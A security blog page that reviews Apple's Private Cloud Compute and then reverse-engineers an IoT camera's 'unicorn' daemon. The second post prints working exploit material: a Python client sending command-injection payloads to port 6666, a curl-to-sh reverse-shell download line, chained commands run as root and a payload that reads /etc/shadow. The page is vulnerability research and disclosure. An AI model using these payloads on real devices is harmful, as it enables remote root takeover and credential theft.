PCC: Bold step forward, not without flaws

14 June 2024 at 19:46

By Adelin Travers

Earlier this week, Apple announced Private Cloud Compute (or PCC for short). Without deep context on the state of the art of Artificial Intelligence (AI) and Machine Learning (ML) security, some sensible design choices may seem surprising. Conversely, some of the risks linked to this design are hidden in the fine print. In this blog post, we’ll review Apple’s announcement, both good and bad, focusing on the context of AI/ML security. We recommend Matthew Green’s excellent thread on X for a more general security context on this announcement:

https://x.com/matthew_d_green/status/1800291897245835616

Disclaimer: This breakdown is based solely on Apple’s blog post and thus subject to potential misinterpretations of wording. We do not have access to the code yet, but we look forward to Apple’s public PCC Virtual Environment release to examine this further!

Review summary

This design is excellent on the conventional non-ML security side. Apple seems to be doing everything possible to make PCC a secure, privacy-oriented solution. However, the amount of review that security researchers can do will depend on what code is released, and Apple is notoriously secretive.

On the AI/ML side, the key challenges identified are on point. These challenges result from Apple’s desire to provide additional processing power for compute-heavy ML workloads today, which incidentally requires moving away from on-device data processing to the cloud. Homomorphic Encryption (HE) is a big hope in the confidential ML field but doesn’t currently scale. Thus, Apple’s choice to process data in its cloud at scale requires decryption. Moreover, the PCC guarantees vary depending on whether Apple uses a PCC environment for model training or inference. Lastly, because Apple is introducing its own custom AI/ML hardware, implementation flaws that lead to information leakage will likely occur in PCC even though such flaws have already been patched in leading AI/ML vendor devices.

Running commentary

We’ll follow the release post’s text in order, section-by-section, as if we were reading and commenting, halting on specific passages.

Introduction


When I first read this post, I’ll admit that I misunderstood this passage as Apple starting an announcement that they had achieved end-to-end encryption in Machine Learning. This would have been even bigger news than the actual announcement.

That’s because Apple would need to use Homomorphic Encryption to achieve full end-to-end encryption in an ML context. HE allows computation of a function, typically an ML model, without decrypting the underlying data. HE has been making steady progress and is a future candidate for confidential ML (see for instance this 2018 paper). However, this would have been a major announcement and shift in the ML security landscape because HE is still considered too slow to be deployed at the cloud scale and in complex functions like ML. More on this later on.
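To make "computing without decrypting" concrete, here is a minimal sketch using a toy Paillier cryptosystem, which is only additively homomorphic (a far weaker property than the fully homomorphic schemes an LLM would need). The tiny primes, the three-element input, and the linear "model" are all illustrative assumptions and have nothing to do with Apple's design.

```python
import math
import random

# Toy Paillier keypair. The primes are tiny so the arithmetic is easy to
# follow; these are NOT secure parameters.
P, Q = 1789, 1861
N = P * Q
N2 = N * N
LAMBDA = (P - 1) * (Q - 1) // math.gcd(P - 1, Q - 1)  # lcm(p-1, q-1)
MU = pow(LAMBDA, -1, N)  # valid because the generator is g = n + 1


def encrypt(m: int) -> int:
    """Encrypt 0 <= m < N using only the public value N."""
    while True:
        r = random.randrange(1, N)
        if math.gcd(r, N) == 1:
            break
    return (pow(1 + N, m, N2) * pow(r, N, N2)) % N2


def decrypt(c: int) -> int:
    """Decrypt with the private values LAMBDA and MU."""
    return ((pow(c, LAMBDA, N2) - 1) // N) * MU % N


def encrypted_dot(weights, enc_inputs):
    """Server side: weighted sum over ciphertexts, with no decryption.

    Multiplying ciphertexts adds their plaintexts; raising a ciphertext
    to a plaintext power multiplies its plaintext by that constant.
    """
    acc = encrypt(0)
    for w, c in zip(weights, enc_inputs):
        acc = (acc * pow(c, w, N2)) % N2
    return acc


inputs = [3, 5, 7]    # client data, encrypted before leaving the device
weights = [2, 4, 6]   # plaintext linear "model" held by the server
enc_result = encrypted_dot(weights, [encrypt(x) for x in inputs])
print(decrypt(enc_result))  # 2*3 + 4*5 + 6*7 = 68
```

Even this single dot product costs several modular exponentiations over numbers the size of N squared, which hints at why scaling the idea to full ML models remains an open problem.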

Note that Multi-Party Computation (MPC)—which allows multiple agents, for instance the server and the edge device, to compute different parts of a function like an ML model and aggregate the result privately—would be a distributed scheme on both the server and edge device which is different from what is presented here.

The term “requires unencrypted access” is the key to the PCC design challenges. Apple could continue processing data on-device, but this means abiding by mobile hardware limitations. The complex ML workloads Apple wants to offload, like using Large Language Models (LLMs), exceed what is practical for battery-powered mobile devices. Apple wants to move the compute to the cloud to provide these extended capabilities, but HE doesn’t currently scale to that level. Thus, to provide these new capabilities today, Apple requires access to unencrypted data.

This being said, Apple’s design for PCC is exceptional, and the effort required to develop this solution was extremely high, going beyond most other cloud AI applications to date.

Thus, the security and privacy of ML models in the cloud is an unsolved and active research domain when an auditor only has access to the model.

A good example of these difficulties can be found in Machine Unlearning—a privacy scheme that allows removing data from a model—that was shown to be impossible to formally prove by just querying a model. Unlearning must thus be proven at the algorithm implementation level.

When the underlying entirely custom and proprietary technical stack of Apple’s PCC is factored in, external audits become significantly more complex. Matthew Green notes that it’s unclear what part of the stack and ML code and binaries Apple will release to audit ML algorithm implementations.

This is also definitely true. Members of the ML Assurance team at Trail of Bits have been releasing attacks that modify the ML software stack at runtime since 2021. Our attacks have exploited the widely used pickle VM for traditional RCE backdoors and malicious custom ML graph operators on Microsoft’s ONNXRuntime. Sleepy Pickles, our most recent attack, uses a runtime attack to dynamically swap an ML model’s weights when the model is loaded.

This is also true; the design later introduced by Apple is far better than many other existing designs.

Designing Private Cloud Compute

From an ML perspective, this claim depends on the intended use case for PCC, as it cannot hold true in general. This claim may be true if PCC is only used for model inference. The rest of the PCC post only mentions inference which suggests that PCC is not currently used for training.

However, if PCC is used for training, then data will be retained, and stateless computation that leaves no trace is likely impossible. This is because ML models retain data encoded in their weights as part of their training. This is why the research field of Machine Unlearning introduced above exists.

The big question that Apple needs to answer is thus whether it will use PCC for training models in the future. As others have noted, this is an easy slope to slip into.

Non-targetability is a really interesting design idea that hasn’t been applied to ML before. It also mitigates hardware leakage vulnerabilities, which we will see next.

Introducing Private Cloud Compute nodes

As others have noted, using Secure Enclaves and Secure Boot is excellent since it ensures only legitimate code is run. GPUs will likely continue to play a large role in AI acceleration. Rather than using Nvidia’s GPUs, which are more pervasive in ML, Apple has been building its own for some time, with its M series now in its third generation.

However, enclaves and attestation will provide only limited guarantees to end-users, as Apple effectively owns the attestation keys. Moreover, enclaves and GPUs have had vulnerabilities and side channels that resulted in exploitable leakage in ML. Apple GPUs have not yet been battle-tested in the AI domain as much as Nvidia’s; thus, these accelerators may have security issues that their Nvidia counterparts do not have. For instance, Apple’s custom hardware was and remains affected by the LeftoverLocals vulnerability, whereas Nvidia’s hardware was not. LeftoverLocals is a GPU hardware vulnerability released by Trail of Bits earlier this year. It allows an attacker collocated with a victim on a vulnerable device to listen to the victim’s LLM output. Apple’s M2 processors remain impacted at the time of writing.

This being said, the PCC design’s non-targetability property may help mitigate LeftoverLocals for PCC since it prevents an attacker from identifying and achieving collocation to the victim’s device.

This is important as Swift is a compiled language. Swift is thus not prone to the dynamic runtime attacks that affect languages like Python, which are more pervasive in ML. Note that Swift would likely only be used for CPU code. The GPU code would likely be written in Apple’s Metal GPU programming framework. More on dynamic runtime attacks and Metal in the next section.

Stateless computation and enforceable guarantees

Apple’s solution is not end-to-end encrypted but rather an enclave-based solution. Thus, it does not represent an advancement in HE for ML but rather a well-thought-out combination of established technologies. This is, again, impressive, but the data is decrypted on Apple’s server.

As presented in the introduction, using compiled Swift and signed code throughout the stack should prevent attacks on ML software stacks at runtime. Indeed, the ONNXRuntime attack defines a backdoored custom ML primitive operator by loading an adversary-built shared library object, while the Sleepy Pickle attack relies on dynamic features of Python.

Just-in-Time (JIT) compiled code has historically been a steady source of remote code execution vulnerabilities. JIT compilers are notoriously difficult to implement and create new executable code by design, making them a highly desirable attack vector. It may surprise most readers, but JIT is widely used in ML stacks to speed up otherwise slow Python code. JAX, an ML framework that is the basis for Apple’s own AXLearn ML framework, is a particularly prolific user of JIT. Apple avoids the security issues of JIT by not using it. Apple’s ML stack is instead built in Swift, a memory safe ahead-of-time compiled language that does not need JIT for runtime performance.

As we’ve said, the GPU code would likely be written in Metal. Metal does not enforce memory safety. Without memory safety, attacks like LeftoverLocals are possible (with limitations on the attacker, like machine collocation).

No privileged runtime access

This is an interesting approach because it shows Apple is willing to trade off infrastructure monitoring capabilities (and thus potentially reduce PCC’s reliability) for additional security and privacy guarantees. To fully understand the benefits and limits of this solution, ML security researchers would need to know what exact information is captured in the structured logs. A complete analysis thus depends on Apple’s willingness or unwillingness to release the schema and pre-determined fields for these logs.

Interestingly, limiting the type of logs could increase ML model risks by preventing ML teams from collecting adequate information to manage these risks. For instance, the choice of collected logs and metrics may be insufficient for the ML teams to detect distribution drift—when input data no longer matches training data and the model performance decreases. If our understanding is correct, most of the collected metrics will be metrics for SRE purposes, meaning that data drift detection would not be possible. If the collected logs include ML information, accidental data leakage is possible but unlikely.
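As a rough illustration of what drift detection needs, the sketch below computes a two-sample Kolmogorov-Smirnov statistic between a training-time feature and the same feature observed in production. The feature (prompt length in tokens), the sample values, and the threshold are hypothetical; the point is only that the check requires per-request input statistics, which SRE-oriented metrics would not normally carry.

```python
from bisect import bisect_right


def ks_statistic(reference, live):
    """Two-sample Kolmogorov-Smirnov statistic: the largest gap between
    the empirical CDFs of the two samples (0 = identical, 1 = disjoint)."""
    ref, cur = sorted(reference), sorted(live)
    gap = 0.0
    for x in ref + cur:
        cdf_ref = bisect_right(ref, x) / len(ref)
        cdf_cur = bisect_right(cur, x) / len(cur)
        gap = max(gap, abs(cdf_ref - cdf_cur))
    return gap


# Hypothetical feature: prompt length in tokens.
training_lengths = [12, 15, 18, 20, 22, 25, 27, 30]
similar_traffic = [13, 16, 19, 21, 23, 24, 28, 29]
drifted_traffic = [80, 95, 110, 120, 130, 150, 170, 200]

DRIFT_THRESHOLD = 0.5  # illustrative cut-off, not a tuned value
for name, sample in [("similar", similar_traffic), ("drifted", drifted_traffic)]:
    d = ks_statistic(training_lengths, sample)
    print(name, round(d, 3), "drift" if d > DRIFT_THRESHOLD else "ok")
```

With these made-up samples the similar traffic scores 0.125 and the drifted traffic scores 1.0. Neither number could be computed from request counts, latencies, or error rates alone.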

Non-targetability

This is excellent as lower levels of the ML stack, including the physical layer, are sometimes overlooked in ML threat models.

The term “metadata” is important here. Only the metadata can be filtered away in the manner Apple describes. However, there are virtually no ways of filtering out all PII in the body content sent to the LLM. Any PII in the body content will be processed unencrypted by the LLM. If PCC is used for inference only, this risk is mitigated by structured logging. If PCC is also used for training, which Apple has yet to clarify, we recommend not sharing PII with systems like these when it can be avoided.

It might be possible for an attacker to obtain identifying information in the presence of side channel vulnerabilities, for instance, linked to implementation flaws, that leak some information. However, this is unlikely to happen in practice: the cost placed on the adversary to simultaneously exploit both the load balancer and side channels will be prohibitive for non-nation-state threat actors.

An adversary with this level of control should be able to spoof the statistical distribution of nodes unless the auditing and statistical analysis are done at the network level.

Verifiable transparency


This is nice to see! Of course, we do not know if these will need to be analyzed through extensive reverse engineering, which will be difficult, if not impossible, for Apple’s custom ML hardware. It is still a commendable rare occurrence for projects of this scale.

PCC: Security wins, ML questions

Apple’s design is excellent from a security standpoint. Improvements on the ML side are always possible. However, it is important to remember that those improvements are tied to some open research questions, like the scalability of homomorphic encryption. Only future vulnerability research will shed light on whether implementation flaws in hardware and software will impact Apple. Lastly, only time will tell if Apple continuously commits to security and privacy by only using PCC for inference rather than training and implementing homomorphic encryption as soon as it is sufficiently scalable.

Reverse Engineering The Unicorn

14 June 2024 at 16:10

While reversing a device, we stumbled across an interesting binary named unicorn. The binary appeared to be a developer utility potentially related to the Augentix SoC SDK. The unicorn binary is only executed when the device is set to developer mode. Fortunately, this was not the default setting on the device we were analyzing. However, we were interested in the consequences of a device that could have been misconfigured.

Discovering the Binary

While analyzing the firmware, we noticed that different services will start upon boot depending on what mode the device is set to.

...SNIPPET...

rcS() {
	# update system mode if a new one exists
	$MODE -u
	mode=$($MODE)
	echo "Current system mode: $mode"

	# Start all init scripts in /etc/init.d/MODE
	# executing them in numerical order.
	#
	for i in /etc/init.d/$mode/S??* ;do

		# Ignore dangling symlinks (if any).
		[ ! -f "$i" ] && continue
		case "$i" in
		*.sh)
		    # Source shell script for speed.
		    (
			trap - INT QUIT TSTP
			set start
			. $i
		    )
		    ;;
		*)
		    # No sh extension, so fork subprocess.
		    $i start
		    ;;
		esac
	done


...SNIPPET...

If the device boots in factory or developer mode, some additional remote services such as telnetd, sshd, and the unicorn daemon are started. The unicorn daemon listens on port 6666, but attempting to interact with it manually didn’t yield any interesting results, so we popped the binary into Ghidra to take a look at what was happening under the hood.

Reverse Engineering the Binary

From the main function we see that if the binary is run with no arguments, it will run as a daemon.

int main(int argc,char **argv)

{
  uint uVar1;
  int iVar2;
  ushort **ppuVar3;
  size_t sVar4;
  char *pcVar5;
  char local_8028 [16];
  
  memset(local_8028,0,0x8000);
  if (argc == 1) {
    openlog("unicorn",1,0x18);
    syslog(5,"unicorn daemon ready to serve!");
                    /* WARNING: Subroutine does not return */
    start_daemon_handle_client_conns();
  }
  while( true ) {
    while( true ) {
      while( true ) {
        iVar2 = getopt(argc,argv,"hsg:c:");
        uVar1 = optopt;
        if (iVar2 == -1) {
          openlog("unicorn",1,0x18);
          syslog(5,"2 unicorn daemon ready to serve!");
                    /* WARNING: Subroutine does not return */
          start_daemon_handle_client_conns();
        }
        if (iVar2 != 0x67) break;
        local_8028[0] = '{';
        local_8028[1] = '\"';
        local_8028[2] = 'm';
        local_8028[3] = 'o';
        local_8028[4] = 'd';
        local_8028[5] = 'u';
        local_8028[6] = 'l';
        local_8028[7] = 'e';
        local_8028[8] = '\"';
        local_8028[9] = ':';
        local_8028[10] = ' ';
        local_8028[11] = '\"';
        pcVar5 = stpcpy(local_8028 + 0xc,optarg);
        memcpy(pcVar5,"\"}",3);
        sVar4 = FUN_00012564(local_8028,0xffffffff);
        if (sVar4 == 0xffffffff) {
          syslog(6,"ccClientGet failed!\n");
        }
      }
      if (0x67 < iVar2) break;
      if (iVar2 == 0x3f) {
        if (optopt == 0x73 || (optopt & 0xfffffffb) == 99) {
          fprintf(stderr,"Option \'-%c\' requires an argument.\n",optopt);
        }
        else {
          ppuVar3 = __ctype_b_loc();
          if (((*ppuVar3)[uVar1] & 0x4000) == 0) {
            pcVar5 = "Unknown option character \'\\x%x.\n";
          }
          else {
            pcVar5 = "Unknown option \'-%c\'.\n";
          }
          fprintf(stderr,pcVar5,uVar1);
        }
        return 1;
      }
      if (iVar2 != 99) goto LAB_0000bb7c;
      sprintf(&DAT_0008c4c4,optarg);
    }
    if (iVar2 == 0x68) {
      USAGE();
                    /* WARNING: Subroutine does not return */
      exit(1);
    }
    if (iVar2 != 0x73) break;
    DAT_0008d410 = 1;
  }
LAB_0000bb7c:
  puts("aborting...");
                    /* WARNING: Subroutine does not return */
  abort();
}

If the argument passed is -h (0x68), then it calls the usage function:

void USAGE(void)

{
  puts("Usage:");
  puts("\t To run unicorn as daemon, do not use any args.");
  puts("\t\'-g get \'\t get product setting. D:img_pref");
  puts("\t\'-s set \'\t set product setting. D:img_pref");
  putchar(10);
  puts("\tSample usage");
  puts("\t$ unicorn -g img_pref");
  return;
}
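The integer constants that Ghidra shows in the getopt() loop are plain ASCII codes for the option letters in the "hsg:c:" option string. The short sketch below decodes them and rebuilds the JSON string that the -g branch assembles byte by byte; the helper name build_get_request is ours, not a symbol from the binary.

```python
# Integer constants compared against getopt()'s return value in main().
DECOMPILED_CASES = [0x67, 0x68, 0x73, 99, 0x3F]
for value in DECOMPILED_CASES:
    print(f"{value:#04x} -> {chr(value)!r}")

# (optopt & 0xfffffffb) == 99 clears bit 2 before comparing, which lets the
# compiler test for two option letters with a single comparison.
masked = [chr(v) for v in range(128) if (v & 0xFFFFFFFB) == 99]
print(masked)


def build_get_request(optarg: str) -> str:
    """String built in local_8028 by the -g branch (hypothetical helper name)."""
    return '{"module": "' + optarg + '"}'


print(build_get_request("img_pref"))
```

This decodes to 'g', 'h', 's', 'c' and '?', so the masked comparison covers the two options that take an argument, -c and -g, and the sample usage `unicorn -g img_pref` produces the request `{"module": "img_pref"}`.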

When no arguments are passed, a function is called that sets up and handles client connections; it appears above, renamed to start_daemon_handle_client_conns(). Most of the code in that function sets up and handles client connections. A small portion performs an initial check of the data received to see whether it contains a specific string, AgtxCrossPlatCommn.

                  else {
                    ptr_result = strstr(DATA_FROM_CLIENT,"AgtxCrossPlatCommn");
                    syslog(6,"%s(): \'%s\'\n","interpretData",DATA_FROM_CLIENT);
                    if (ptr_result == (char *)0x0) {
                      syslog(6,"Invalid command \'%s\' received! Closing client fd %d\n",0,__fd_00);
                      goto LAB_0000e02c;
                    }
                    if ((DATA_FROM_CLIENT_PLUS1[command_length] != '@') ||
                       (client_command_buffer = (byte *)(ptr_result + 0x12),
                       client_command_buffer == (byte *)0x0)) goto LAB_0000e02c;
                    if (IS_SSL_ENABLED != 1) {
                      syslog(6,"Handle action for client %2d, fdmax = %d ...\n",__fd_00,uVar12);
                      command_length =
                           handle_client_cmd(client_command_buffer,client_info,command_length);
                      if (command_length != 0) {
                        send_response_to_client
                                  ((int)*client_info,apSStack_8520 + uVar9 * 5 + 2,command_length);
                      }
                      goto LAB_0000e02c;
                    }

After locating the AgtxCrossPlatCommn string, the code checks that the data received ends with an @ character and that the pointer to the data following the string is not NULL. If either check fails, it branches off. If both checks pass, the data is sent to another function that processes the commands from the client. At this point we know that the binary expects to receive data in the format AgtxCrossPlatCommn<DATA>@. The handle_client_cmd function is where the fun happens. The beginning of the function handles some additional processing of the data received.

  if (client_command_buffer == (byte *)0x0) {
    syslog(6,"Invalid action: sig is NULL \n");
    return -3;
  }
  ACTION_NUM = get_Action_NUM(client_command_buffer);
  client_command = get_cmd_data(client_command_buffer,command_length);
  operation_result = ACTION_NUM;
  iVar1 = command_length;
  ptr_to_cmd = client_command;
  syslog(6,"%s(): action %d, nbytes %d, params %s\n","handleAction",ACTION_NUM,command_length,
         client_command);
  memset(system_command_buffer,0,0x100);
  switch(ACTION_NUM) {
  case 0:

The binary expects the data received to contain a number, which is parsed out and passed to a switch() statement to determine which action to execute. There are a total of 15 actions that perform various tasks such as reading files, writing files, and executing arbitrary commands (some intentional, others not), along with others whose purpose wasn’t immediately clear. The first action number that caught our eye was 14 (0xe), as it appeared to directly allow us to run commands.
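As a rough model of the message handling described so far, the following sketch builds and parses messages of the form AgtxCrossPlatCommn<DATA>@. The function names are ours, and the assumption that the action number is simply the run of leading decimal digits is inferred from the payloads used in this post rather than from the decompiled get_Action_NUM.

```python
import re

MAGIC = "AgtxCrossPlatCommn"  # 18 bytes, matching the 0x12 offset in the decompilation
TERMINATOR = "@"


def build_message(action: int, params: str = "") -> bytes:
    """Frame an action number and its parameters the way the daemon expects."""
    return f"{MAGIC}{action}{params}{TERMINATOR}".encode()


def parse_message(raw: bytes):
    """Return (action, params), or None if the framing checks fail."""
    text = raw.decode("latin-1")
    start = text.find(MAGIC)  # mirrors the strstr() call
    if start == -1 or not text.endswith(TERMINATOR):
        return None
    body = text[start + len(MAGIC):-1]
    # Assumption: the action number is the run of leading decimal digits.
    match = re.match(r"(\d+)(.*)", body, re.DOTALL)
    if match is None:
        return None
    return int(match.group(1)), match.group(2)


print(len(MAGIC) == 0x12)
print(parse_message(build_message(14, "ifconfig")))
print(parse_message(b"hello@"))
```

The first call prints True, the second yields the pair (14, 'ifconfig'), and the third yields None because the magic string is missing.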

  case 0xe:
/* execute commands here
AgtxCrossPlatCommn14 sh -c 'curl 192.168.55.1/shell.sh | sh'@ */

    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    syslog(6,"ACT_cmd: |%s| \n",client_command);
    command_params = strstr(client_command,"rm ");
    if (command_params == (char *)0x0) {
      command_params = strstr(client_command,"audioctrl");
      if (((((((command_params != (char *)0x0) ||
              (command_params = strstr(client_command,"light_test"), command_params != (char *)0x0))
             || (command_params = strstr(client_command,"ir_cut.sh"), command_params != (char *)0x0)
             ) || ((command_params = strstr(client_command,"led.sh"), command_params != (char *)0x0
                   || (command_params = strstr(client_command,"sh"), command_params != (char *)0x0))
                  )) ||
           ((command_params = strstr(client_command,"touch"), command_params != (char *)0x0 ||
            ((command_params = strstr(client_command,"echo"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"find"), command_params != (char *)0x0)))))) ||
          (command_params = strstr(client_command,"iwconfig"), command_params != (char *)0x0)) ||
         (((((command_params = strstr(client_command,"ifconfig"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"killall"), command_params != (char *)0x0)) ||
            (command_params = strstr(client_command,"reboot"), command_params != (char *)0x0)) ||
           (((command_params = strstr(client_command,"mode"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"gpio_utils"), command_params != (char *)0x0))
            || ((command_params = strstr(client_command,"bp_utils"), command_params != (char *)0x0
                || ((command_params = strstr(client_command,"sync"), command_params != (char *)0x0
                    || (command_params = strstr(client_command,"chmod"),
                       command_params != (char *)0x0)))))))) ||
          ((command_params = strstr(client_command,"dos2unix"), command_params != (char *)0x0 ||
           (command_params = strstr(client_command,"mkdir"), command_params != (char *)0x0)))))) {
        syslog(6,"Command code: %d\n");
        system_command_status = run_system_cmd(client_command);
        goto LAB_0000b458;
      }
      system_command_result = -1;
    }
    else {
      system_command_result = -2;
    }
    syslog(3,"Invaild command code: %d\n",system_command_result);
    system_command_status = -1;
LAB_0000b458:
    send_response_to_client((int)*client_info,(SSL **)(client_info + 4),system_command_status);
    break;

To test, we manually started the unicorn binary and attempted to issue an ifconfig command with the payload AgtxCrossPlatCommn14ifconfig@ and the following Python script:

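import socket

HOST = "192.168.55.128"  # address of the target device
PORT = 6666              # port the unicorn daemon listens on

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(5)  # the daemon may not reply, so don't block forever
    s.connect((HOST, PORT))
    # Framing: magic string + action number (14) + command + '@' terminator
    s.sendall(b"AgtxCrossPlatCommn14ifconfig@")
    try:
        data = s.recv(1024)
    except socket.timeout:
        data = b""
    print("RX:", data.decode("utf-8", errors="replace"))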

No data was written back to the socket, but on the emulated device we saw that the command was executed:

/system/bin # ./unicorn 
eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56  
          inet addr:192.168.100.2  Bcast:192.168.100.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5849 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4680 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6133675 (5.8 MiB)  TX bytes:482775 (471.4 KiB)
          Interrupt:47 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Note that the difference in the IP address is due to the device being emulated with EMUX (https://emux.exploitlab.net/). One of the commands that is “allowed” per this case is sh, which means we can actually run any command on the system and not just the ones listed. For example, the following payload could be used to download and execute a reverse shell on the device:

AgtxCrossPlatCommn14 sh -c 'curl 192.168.55.1/shell.sh | sh'@

Even if this case didn’t allow for the execution of sh, commands could still be chained together and executed with a payload like AgtxCrossPlatCommn14echo hello;id;ls -l@.

/system/bin # ./unicorn                                                                             
hello                                                                                               
uid=0(root) gid=0(root) groups=0(root),10(wheel)                                                    
-rwxr-xr-x    1 dbus     dbus          3774 Apr  9 20:33 actl
-rwxr-xr-x    1 dbus     dbus          2458 Apr  9 20:33 adc_read    
-rwxr-xr-x    1 dbus     dbus       1868721 Apr  9 20:33 av_main   
-rwxr-xr-x    1 dbus     dbus          5930 Apr  9 20:33 burn_in
-rwxr-xr-x    1 dbus     dbus        451901 Apr  9 20:33 cmdsender
-rwxr-xr-x    1 dbus     dbus         13166 Apr  9 20:33 cpu      
-rwxr-xr-x    1 dbus     dbus        162993 Apr  9 20:33 csr    
-rwxr-xr-x    1 dbus     dbus          9006 Apr  9 20:33 dbmonitor
-rwxr-xr-x    1 dbus     dbus         13065 Apr  9 20:33 ddr2pgm     
-rwxr-xr-x    1 dbus     dbus          2530 Apr  9 20:33 dump                  
-rwxr-xr-x    1 dbus     dbus          4909 Apr  9 20:33 dump_csr   
...SNIP...
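The filter in case 0xe is a chain of strstr() calls, so it matches substrings anywhere in the command rather than whole command names. The sketch below is our Python model of that logic, not code from the binary: the return values -2 and -1 mirror system_command_result in the decompilation, and 0 is our stand-in for "passed to run_system_cmd".

```python
ALLOWED_SUBSTRINGS = [
    "audioctrl", "light_test", "ir_cut.sh", "led.sh", "sh", "touch", "echo",
    "find", "iwconfig", "ifconfig", "killall", "reboot", "mode", "gpio_utils",
    "bp_utils", "sync", "chmod", "dos2unix", "mkdir",
]


def filter_result(command: str) -> int:
    """0 = would be executed, -2 = contains 'rm ', -1 = no allowed substring."""
    if "rm " in command:
        return -2
    if any(token in command for token in ALLOWED_SUBSTRINGS):
        return 0
    return -1


samples = [
    "ifconfig",
    "echo hello;id;ls -l",
    " sh -c 'curl 192.168.55.1/shell.sh | sh'",
    "cat /etc/shadow",   # accepted only because "shadow" contains "sh"
    "id",
    "rm -rf /tmp/x",
]
for cmd in samples:
    print(repr(cmd), filter_result(cmd))
```

Only the bare `id` and the `rm ` command are rejected. Anything that merely contains one of the listed strings goes through unchanged, including everything after a `;`.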

We performed analysis of other areas of the unicorn executable and identified additional command injection and buffer overflow vulnerabilities. Case 2 is used to execute the cmdsender binary on the device, which appears to be a utility to control certain camera-related aspects of the device.

  case 2:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    path_buffer[0] = '/';
    path_buffer[1] = 's';
    path_buffer[2] = 'y';
    path_buffer[3] = 's';
    path_buffer[4] = 't';
    path_buffer[5] = 'e';
    path_buffer[6] = 'm';
    path_buffer[7] = '/';
    path_buffer[8] = 'b';
    path_buffer[9] = 'i';
    path_buffer[10] = 'n';
    path_buffer[11] = '/';
    path_buffer[12] = 'c';
    path_buffer[13] = 'm';
    path_buffer[14] = 'd';
    path_buffer[15] = 's';
    path_buffer[16] = 'e';
    path_buffer[17] = 'n';
    path_buffer[18] = 'd';
    path_buffer[19] = 'e';
    path_buffer[20] = 'r';
    path_buffer[21] = ' ';
    path_buffer[22] = '\0';
    memset(large_buffer,0,0x7fe9);
    strcpy(path_buffer + 0x16,client_command);
    run_system_cmd(path_buffer);
    break;

Running the cmdsender binary on the device:

/system/bin # ./cmdsender -h        
[VPLAT] VB init fail.
[VPLAT] UTRC init fail.
[VPLAT] SR open shared memory fail.
[VPLAT] SENIF init fail.
[VPLAT] IS init fail.                            
[VPLAT] ISP init fail.                                                                              
[VPLAT] ENC init fail.                                                                                                                                                                                   
[VPLAT] OSD init fail.                                                                              
USAGE:                                                                                                                                                                                                   
        ./cmdsender [Option] [Parameter]                                                                                                                                                                 
                                                                                                                                                                                                         
OPTION:                                           
        '--roi dev_idx path_idx luma_roi.sx luma_roi.sy luma_roi.ex luma_roi.ey awb_roi.sx awb_roi.sy awb_roi.ex awb_roi.ey' Set ROI attributes
        '--pta dev_idx path_idx mode brightness_value contrast_value break_point_value pta_auto.tone[0 ~ MPI_ISO_LUT_ENTRY_NUM-1] pta_manual.curve[0 ~ MPI_PTA_CURVE_ENTRY_NUM-1]' Set PTA attributes
                                                                                                    
        '--dcc dev_idx path_idx gain0 offset0 gain1 offset1 gain2 offset2 gain3 offset3' Set DCC attributes
                                                                                                    
        '--dip dev_idx path_idx is_dip_en is_ae_en is_iso_en is_awb_en is_csm_en is_te_en is_pta_en is_nr_en is_shp_en is_gamma_en is_dpc_en is_dms_en is_me_en' Set DIP attributes
                                                                                                    
        '--lsc dev_idx path_idx origin x_trend_2s y_trend_2s x_curvature y_curvature tilt_2s' Set LSC attributes

        '--gamma dev_idx path_idx mode' Set GAMMA attributes
                                                                                                    
        '--ae dev_idx path_idx sys_gain_range.min sys_gain_range.max sensor_gain_range.min sensor_gain_range.max isp_gain_range.min isp_gain_range.max frame_rate slow_frame_rate speed black_speed_bias 
interval brightness tolerance gain_thr_up gain_thr_down 
              strategy.mode strategy.strength roi.luma_weight roi.awb_weight delay.black_delay_frame delay.white_delay_frame anti_flicker.enable anti_flicker.frequency anti_flicker.luma_delta fps_mode 
manual.is_valid manual.enable.bit.exp_value manual.enable.bit.inttime
              manual.enable.bit.sensor_gain manual.enable.bit.isp_gain manual.enable.bit.sys_gain manual.exp_value manual.inttime manual.sensor_gain manual.isp_gain manual.sys_gain' Set AE attributes

        '--iso dev_idx path_idx mode iso_auto.effective_iso[0 ~ MPI_ISO_LUT_ENTRY_NUM-1] iso_manual.effective_iso' Set iso attributes

        '--dbc dev_idx path_idx mode dbc_level' Set DBC attributes

The arguments that are intended to be used with the cmdsender command are received and copied directly to the cmdsender path, which is then passed to run_system_cmd, which simply runs system() on the given argument. The payload AgtxCrossPlatCommn2 ; id @ causes the id command to be run on the device:

/system/bin # ./unicorn 
[VPLAT] VB init fail.
[VPLAT] UTRC init fail.
[VPLAT] SR open shared memory fail.
[VPLAT] SENIF init fail.
[VPLAT] IS init fail.
[VPLAT] ISP init fail.
[VPLAT] ENC init fail.
[VPLAT] OSD init fail.
executeCmd(): Unknown command item
item: 920495836, direction: 1
printCmd(): Unknown command item
uid=0(root) gid=0(root) groups=0(root),10(wheel)

Case 4 handles sending files from the device to the connecting client. For example, to get /etc/shadow from the device, the payload AgtxCrossPlatCommn4/etc/shadow@ can be used.

python3 case_4.py 
